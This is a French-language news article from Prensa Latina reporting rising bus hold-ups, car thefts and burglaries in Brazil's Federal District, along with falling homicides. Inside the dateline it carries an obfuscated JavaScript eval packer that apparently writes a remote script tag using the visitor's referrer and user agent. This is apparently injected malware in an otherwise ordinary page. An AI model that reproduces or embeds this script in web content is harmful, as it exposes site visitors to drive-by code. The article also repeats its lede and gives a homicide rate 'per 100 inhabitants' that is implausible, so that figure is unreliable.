jeudi 18 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

La crise et le chômage suscitent des vols et hold-up au Brésil

Brasilia, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bzaek|var|u0026u|referrer|yzyde||js|php'.split('|'),0,{})) 16 jan (PL) La sévère crise économique et le haut taux de chômage qui frappe le géant sud-américain favorise la hausse du nombre de cambriolages et hold-up dans les rues au autobus.

Brasilia, 16 jan (PL) La sévère crise économique et le haut taux de chômage qui frappe le géant sud-américain favorise la hausse du nombre de cambriolages et hold-up dans les rues au autobus.

Il n’est pas un excès de rhétorique affirmer que le chômage et la crise économique constituent des facteurs clés dans la hausse de vols et cambriolages. Ceci est une question préliminaire, technique et une tendance au Brésil, dit Marcia Araujo, secrétaire de la Sécurité dans le District Fédéral.
 
De décembre 2015 a décembre 2016 les attaques à main armée dans des autobus se sont accrus de 44,6 %, soit de 253 à 371 cas.

Dans le cas des attaques aux automobiles ils ont augmenté de 14,9 % alors que les cambriolages ont connu une augmentation de 12,2 %. Par rapport aux hold-up à l’encontre des piétons il y a eu une montée de 8,6 %, dans la plupart de cas le but était de s’emparer des téléphones portables.

Le rapport présenté par la titulaire de la Sécurité fait état en revanche, d’après Angencia Brasil, d’une chute du nombre d’homicides : le taux d’homicide est de 19,7 sur 100 habitants, le plus bas jamais signalé dans le District Fédéral depuis 1993 lorsque la ville était peuplée par 1,7 millions d’habitants (aujourd’hui il y en a 2,9 millions).
 
La tendance à la réduction d’homicides s’est maintenue durant les premiers jours de l’année actuelle, indique Mme Araujo. Ceci est grâce aux nombreuses opération policières déclenchées dans des endroits spécifiques de la capitale.

Rm/lp/lma/mpm

EN CONTINU
notes connexes